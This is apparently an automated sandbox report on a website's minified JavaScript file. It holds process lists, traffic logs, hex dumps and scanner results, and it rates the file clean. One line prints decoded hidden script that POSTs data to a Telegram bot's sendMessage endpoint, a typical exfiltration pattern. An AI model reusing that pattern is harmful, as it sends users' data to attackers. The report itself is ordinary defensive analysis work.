Edit tour

Windows Analysis Report
http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js

Overview

General Information

Sample URL:http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js
Analysis ID:1473689
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 5568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2164,i,12285018942571206680,11047259333172160187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.jsHTTP Parser: Base64 decoded: var x = new XMLHttpRequest(); x.open("POST", "https://api.telegram.org/bot"+tbot+"/sendMessage", true); x.setRequestHeader('Content-Type', 'application/json; charset=utf-8'); x.withCredentials = false;var dd = JSON.stringify({ chat_id: ...
Source: http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.jsHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.4:56988 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.126.137
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.126.137
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: Sucuri/CloudproxyDate: Mon, 15 Jul 2024 16:19:03 GMTContent-Type: application/x-javascriptContent-Length: 5059Connection: keep-aliveX-Sucuri-ID: 14035X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Tue, 16 Jan 2024 21:17:46 GMTETag: "283c-60f16a9661280-gzip"Cache-Control: max-age=315360000Expires: Thu, 31 Dec 2037 23:55:55 GMTContent-Encoding: gzipReferrer-Policy: no-referrer-when-downgradeX-Cache-NxAccel: MISSAccept-Ranges: bytesX-Sucuri-Cache: MISSData Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 5a 69 73 da ca d2 fe 7c f2 2b 9c aa 7b 2d 14 f0 89 24 c0 36 e1 28 a7 cc 0e b6 44 d8 c4 16 df 94 a4 19 81 40 48 04 09 b3 c4 fe ef 6f f7 48 80 20 c9 b9 b7 de 4a 61 8d 66 e9 6d ba 9f ee 19 25 61 ad 5d 33 b0 3d f7 2a c1 5f fd 78 f7 07 b7 f6 e9 95 1f ac 6c 33 e0 f2 ef de fd 61 7a ae 1f 5c 11 fa 12 78 9e e3 5f c9 38 e7 0f db 6f 2e a9 fb e9 ca d2 1d 9f a6 a0 c3 5b d9 d4 0d 74 a4 f3 e9 6a ed 12 6a d9 2e 25 ef fe 78 3b 91 08 a6 2b ea 4f 3d 87 00 0d f1 56 38 0d d0 85 1d 94 5f 60 39 0c 24 42 ca a9 ab 18 41 fe 4a fe cc b8 6e 6c 97 78 9b 3f 89 ed 2f f5 c0 9c b2 35 09 97 6e ae 8a 6b 3f f0 16 e1 3b 77 10 d5 9c ea ee 84 72 29 b6 f4 0f 42 03 dd 76 3e 85 2f 91 fc 29 d6 8e 71 c2 f7 37 f8 f3 c6 f3 f9 48 76 9f 06 75 37 a0 ab 17 dd 49 24 8e 92 84 82 6f 6c 12 4c bb 31 b5 22 01 bd 35 2c e8 e3 e0 d5 cd a1 cf 76 dd 43 df e7 93 29 f2 47 5a 53 6a 4f a6 c1 ef 88 d5 d8 e8 05 b5 a8 f3 97 e4 62 4a 31 52 67 82 fe 7d c5 bd d0 55 60 9b ba c3 5d 7d ba e2 a6 30 7b ef c1 74 87 ed f8 1f b6 75 95 40 53 bc 4f 5c 4a 75 7d 7d 41 8b 87 2e 9c 9a 48 44 92 55 ec 15 35 d6 93 70 66 bc e7 4f 73 ba f2 16 f4 b7 03 7f da 7e dd b5 03 5b 77 ec 3d 05 ba af af 97 62 43 cf 85 3c 3c b0 e6 c3 2d 45 99 df 1f b6 fe cf 70 7f 71 c5 b1 2b 6e 91 f7 b2 7c ee 60 a1 57 1c 1d 31 11 ac d6 f4 dc 07 f3 a1 6f 84 ae 74 ce 45 be c2 e9 f9 b3 a1 73 fb c7 de 70 da db 15 85 b0 39 c9 7d 41 f0 67 71 c2 30 3b c5 d5 3f 4b c3 66 ff 93 38 47 3a 4c 18 70 f4 d4 55 56 10 78 dc 7b 14 27 d8 2d a9 67 5d 2d 3c b2 76 28 b3 15 77 5c c1 e1 fe 85 23 7f d2 ed d2 5b 05 7e 28 ee 79 1f 30 39 f0 c6 40 3a e9 7b 08 e1 13 9c c4 e7 bd 7b e3 13 28 c6 8b be ba f2 64 23 9f 38 60 53 c2 4c 11 fe 07 76 2f 64 23 45 65 13 a6 6d a6 b6 43 13 ef df 8f 9f f9 1f c1 6a c7 46 2d f9 66 a9 af 7c 0a 21 9b 58 24 84 2d c9 f2 fc 47 61 2b 26 cf 7a a9 c1 7a a5 f3 de 9c c4 7a d3 17 bd 77 ac 37 93 3c 27 ac a7 59 77 f6 43 e2 bc df a4 ac ff 96 3f a7 62 89 ac fb ee 82 8a 25 b0 ee fb 0f Data Ascii: Zis|+{-$6(D@HoH Jafm%a]3=*_xl3az\x_8o.[tjj.%x;+O=V8_`9$BAJnlx?/5nk?;wr)Bv>/)q7Hvu7I$olL1"5,vC)GZSjObJ1Rg}U`]}0{tu@SO\Ju}}A.HDU5pfOs~[w=bC<<-Epq+n|`W1otEsp9}Agq0;
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: Sucuri/CloudproxyDate: Mon, 15 Jul 2024 16:19:03 GMTContent-Type: image/x-iconContent-Length: 1418Connection: keep-aliveX-Sucuri-ID: 14035X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Tue, 16 Jan 2024 21:17:01 GMTETag: "3c2e-60f16a6b76d40-gzip"Cache-Control: max-age=315360000Expires: Thu, 31 Dec 2037 23:55:55 GMTContent-Encoding: gzipReferrer-Policy: no-referrer-when-downgradeX-Cache-NxAccel: MISSAccept-Ranges: bytesX-Sucuri-Cache: MISSData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 79 50 95 55 14 ff 48 5b a6 b2 b0 b2 c5 b4 48 cd 61 1a 6b 68 d1 6a aa 99 6c da 26 73 5a a6 71 5a 44 b0 c2 50 51 54 28 97 64 c0 dc 13 77 d3 d2 21 41 40 e1 b1 f3 de e3 b1 ca f2 78 2c 02 0f 78 ec 3b 3c 78 2c ca a6 a4 d5 5f bf ee 39 0f 19 6d b0 c8 66 7a bd ba bf 99 33 df f7 dd 7b cf 3d e7 9e bb cc 99 ef 77 15 c5 41 19 a7 38 3a 2a e2 e9 a4 78 8e 57 94 39 8a a2 38 39 59 bf 9d 27 2a ca 8f a2 cc c5 65 b8 7e a6 a2 e4 4d 52 14 67 d1 c6 91 da 29 d6 f2 6b 01 12 36 45 de c1 05 30 ec 7f ff ba 24 ef d0 02 c4 2e b9 03 ba af 9c 51 15 bf 19 75 49 81 a8 88 f6 43 59 b8 0f ea 53 0f 20 ef c0 07 a8 88 fa 1a c5 c7 3d 51 1e b1 16 a6 c8 75 30 86 7a c3 18 b2 1c e9 9b 9e 43 ac c7 04 d6 57 2d 72 40 d9 29 5f 54 27 6e 83 61 df bb d0 07 ce 43 d6 8e 57 91 2d a4 e0 c8 27 28 09 5e 86 ec 6f df 40 ae a8 23 9b b9 7b df 41 92 ef 0c d6 37 ec 7b 0f fa 3d f3 af 4b 48 57 c2 b6 b8 e6 c1 30 46 38 0f 9f 31 2f cb 73 46 42 42 42 42 62 14 d4 27 ef 43 43 ea 41 9b 49 92 ef a3 88 f3 9c 68 13 d1 fa 4c 87 da 7b 2a 54 ae 0a 8b 3e f0 2d a4 fa 3d 85 a2 20 0f 18 4f 78 e1 cc 0f 6e 48 dd f8 24 bf 1b 43 bc 90 b5 fd 95 91 f7 d4 8d 2e 9c eb 51 7d b1 68 1f b5 e8 06 ce c9 d2 fc 9e c6 e9 cd 2f 22 47 e4 65 fa dd 6f 23 cd 7f 36 4e 6f 79 09 e9 fe 73 44 f9 0b 48 0f 78 76 c4 5e e2 ca 07 af b2 4f 39 67 8b 3e 04 e7 2d d5 68 3f 13 8d ee 8a 54 9c ef a8 14 39 e4 37 30 17 44 a2 fc a4 2f ce d5 1b d0 5e 14 83 e6 ec 20 b6 5d 2b 72 cb be c6 42 54 27 6c 45 4f 55 06 eb 9d ad cd 41 9b 21 5c e8 44 a0 3e 65 3f ba 4c 29 22 57 5c 8a 41 73 39 97 a9 84 af a3 d9 8f 76 bf 11 fd ad 46 e1 43 30 06 db 2b 71 ae 4e 2f fa dd 82 c6 8c 23 a8 d3 ed 41 8d 66 87 c8 63 37 a2 21 ed 10 ca 4e fa f0 38 75 6b 9d d9 e6 a0 d9 64 2d 0f 5f c3 be 9a 0b 55 ac 47 be b2 bf 59 c7 b8 5f 5a 6f d7 1a 3f 49 ce ae 37 91 b8 e2 01 8e 23 e5 b3 2a 57 07 e8 be 9c 89 84 65 93 ae 6a 17 eb 71 3b f2 45 bc 68 1e 28 0f a6 bc f8 ca fa b1 08 d9 a7 7c 39 ee 0b 47 9b 88 76 cd 34 ce ed 6b b5 bb 6c 22 35 9a 9d b6 3e 7e 24 24 Data Ascii: ZyPUH[Hakhjl&sZqZDPQT(dw!A@x,x;<x,_9mfz3{=wA8:*xW989Y'*e~MRg)k6E0$.QuICYS =Qu0zCW-r@)_T'naCW-'(^o@#{A7{=KHW0F81/sFBBBBb'CCAIhL{*T>-= OxnH$C.Q}h/"Geo#6NoysDHxv^O9g>-h?
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: Sucuri/CloudproxyDate: Mon, 15 Jul 2024 16:19:04 GMTContent-Type: image/x-iconContent-Length: 1418Connection: keep-aliveX-Sucuri-ID: 14035X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingLast-Modified: Tue, 16 Jan 2024 21:17:01 GMTETag: "3c2e-60f16a6b76d40-gzip"Cache-Control: max-age=315360000Expires: Thu, 31 Dec 2037 23:55:55 GMTContent-Encoding: gzipReferrer-Policy: no-referrer-when-downgradeX-Cache-NxAccel: HITX-Sucuri-Cache: MISSAccept-Ranges: bytesData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 79 50 95 55 14 ff 48 5b a6 b2 b0 b2 c5 b4 48 cd 61 1a 6b 68 d1 6a aa 99 6c da 26 73 5a a6 71 5a 44 b0 c2 50 51 54 28 97 64 c0 dc 13 77 d3 d2 21 41 40 e1 b1 f3 de e3 b1 ca f2 78 2c 02 0f 78 ec 3b 3c 78 2c ca a6 a4 d5 5f bf ee 39 0f 19 6d b0 c8 66 7a bd ba bf 99 33 df f7 dd 7b cf 3d e7 9e bb cc 99 ef 77 15 c5 41 19 a7 38 3a 2a e2 e9 a4 78 8e 57 94 39 8a a2 38 39 59 bf 9d 27 2a ca 8f a2 cc c5 65 b8 7e a6 a2 e4 4d 52 14 67 d1 c6 91 da 29 d6 f2 6b 01 12 36 45 de c1 05 30 ec 7f ff ba 24 ef d0 02 c4 2e b9 03 ba af 9c 51 15 bf 19 75 49 81 a8 88 f6 43 59 b8 0f ea 53 0f 20 ef c0 07 a8 88 fa 1a c5 c7 3d 51 1e b1 16 a6 c8 75 30 86 7a c3 18 b2 1c e9 9b 9e 43 ac c7 04 d6 57 2d 72 40 d9 29 5f 54 27 6e 83 61 df bb d0 07 ce 43 d6 8e 57 91 2d a4 e0 c8 27 28 09 5e 86 ec 6f df 40 ae a8 23 9b b9 7b df 41 92 ef 0c d6 37 ec 7b 0f fa 3d f3 af 4b 48 57 c2 b6 b8 e6 c1 30 46 38 0f 9f 31 2f cb 73 46 42 42 42 42 62 14 d4 27 ef 43 43 ea 41 9b 49 92 ef a3 88 f3 9c 68 13 d1 fa 4c 87 da 7b 2a 54 ae 0a 8b 3e f0 2d a4 fa 3d 85 a2 20 0f 18 4f 78 e1 cc 0f 6e 48 dd f8 24 bf 1b 43 bc 90 b5 fd 95 91 f7 d4 8d 2e 9c eb 51 7d b1 68 1f b5 e8 06 ce c9 d2 fc 9e c6 e9 cd 2f 22 47 e4 65 fa dd 6f 23 cd 7f 36 4e 6f 79 09 e9 fe 73 44 f9 0b 48 0f 78 76 c4 5e e2 ca 07 af b2 4f 39 67 8b 3e 04 e7 2d d5 68 3f 13 8d ee 8a 54 9c ef a8 14 39 e4 37 30 17 44 a2 fc a4 2f ce d5 1b d0 5e 14 83 e6 ec 20 b6 5d 2b 72 cb be c6 42 54 27 6c 45 4f 55 06 eb 9d ad cd 41 9b 21 5c e8 44 a0 3e 65 3f ba 4c 29 22 57 5c 8a 41 73 39 97 a9 84 af a3 d9 8f 76 bf 11 fd ad 46 e1 43 30 06 db 2b 71 ae 4e 2f fa dd 82 c6 8c 23 a8 d3 ed 41 8d 66 87 c8 63 37 a2 21 ed 10 ca 4e fa f0 38 75 6b 9d d9 e6 a0 d9 64 2d 0f 5f c3 be 9a 0b 55 ac 47 be b2 bf 59 c7 b8 5f 5a 6f d7 1a 3f 49 ce ae 37 91 b8 e2 01 8e 23 e5 b3 2a 57 07 e8 be 9c 89 84 65 93 ae 6a 17 eb 71 3b f2 45 bc 68 1e 28 0f a6 bc f8 ca fa b1 08 d9 a7 7c 39 ee 0b 47 9b 88 76 cd 34 ce ed 6b b5 bb 6c 22 35 9a 9d b6 3e 7e 24 24 24 Data Ascii: ZyPUH[Hakhjl&sZqZDPQT(dw!A@x,x;<x,_9mfz3{=wA8:*xW989Y'*e~MRg)k6E0$.QuICYS =Qu0zCW-r@)_T'naCW-'(^o@#{A7{=KHW0F81/sFBBBBb'CCAIhL{*T>-= OxnH$C.Q}h/"Geo#6NoysDHxv^O9g>-h
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /assets/js/main-f49476672004c4aclccf.min.js HTTP/1.1Host: atkinsandpearce.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: atkinsandpearce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.jsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: atkinsandpearce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: atkinsandpearce.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56992
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: classification engineClassification label: clean1.win@16/5@6/4
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2164,i,12285018942571206680,11047259333172160187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2164,i,12285018942571206680,11047259333172160187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1473689 URL: http://atkinsandpearce.com/... Startdate: 15/07/2024 Architecture: WINDOWS Score: 1 5 chrome.exe 1 2->5         started        8 chrome.exe 2->8         started        dnsIp3 13 192.168.2.4, 138, 443, 49672 unknown unknown 5->13 15 239.255.255.250 unknown Reserved 5->15 10 chrome.exe 5->10         started        process4 dnsIp5 17 atkinsandpearce.com 192.124.249.185, 49735, 49736, 49738 SUCURI-SECUS United States 10->17 19 www.google.com 172.217.18.4, 443, 49741, 56992 GOOGLEUS United States 10->19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://atkinsandpearce.com/favicon.ico0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.18.4
truefalse
    unknown
    atkinsandpearce.com
    192.124.249.185
    truefalse
      unknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.jsfalse
          unknown
          http://atkinsandpearce.com/favicon.icofalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          192.124.249.185
          atkinsandpearce.comUnited States
          30148SUCURI-SECUSfalse
          239.255.255.250
          unknownReserved
          unknownunknownfalse
          172.217.18.4
          www.google.comUnited States
          15169GOOGLEUSfalse
          IP
          192.168.2.4
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1473689
          Start date and time:2024-07-15 18:17:55 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 29s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:browseurl.jbs
          Sample URL:http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:CLEAN
          Classification:clean1.win@16/5@6/4
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 142.250.186.46, 74.125.133.84, 142.250.185.67, 34.104.35.123, 40.127.169.103, 88.221.110.91, 2.16.100.168, 20.3.187.198, 192.229.221.95, 93.184.221.240, 52.165.164.15, 13.85.23.206, 131.107.255.255, 216.58.206.67
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, wu.azureedge.net, dns.msftncsi.com, clients2.google.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js
          No simulations
          No context
          No context
          No context
          No context
          No context
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:gzip compressed data, from Unix, original size modulo 2^32 15406
          Category:downloaded
          Size (bytes):1418
          Entropy (8bit):7.808280961928703
          Encrypted:false
          SSDEEP:24:XoUfrY8niiwgvR5bh1ml9YN9AzOipZSzQ7za2Qd2DDDSSApk1:XoUDdi8z11m9YcOgCWXx/1
          MD5:CFD5FAAC936F52F94D4B0549A01790F1
          SHA1:A4B603F97A1704D4FE6677D97347C1FD66AF0EF0
          SHA-256:E73B53ADEEB9CE4FC8158FAD84A7CC5011754C0A2C86C8CD84304C70BBBCF318
          SHA-512:736650808381AB42382BAD44007DA8E917861EB913904A802B2132B1F9C0724CD151A112792CD02A4828590243AD9B56718DF6AB90EF3221065E794E1CDBB119
          Malicious:false
          Reputation:low
          URL:http://atkinsandpearce.com/favicon.ico
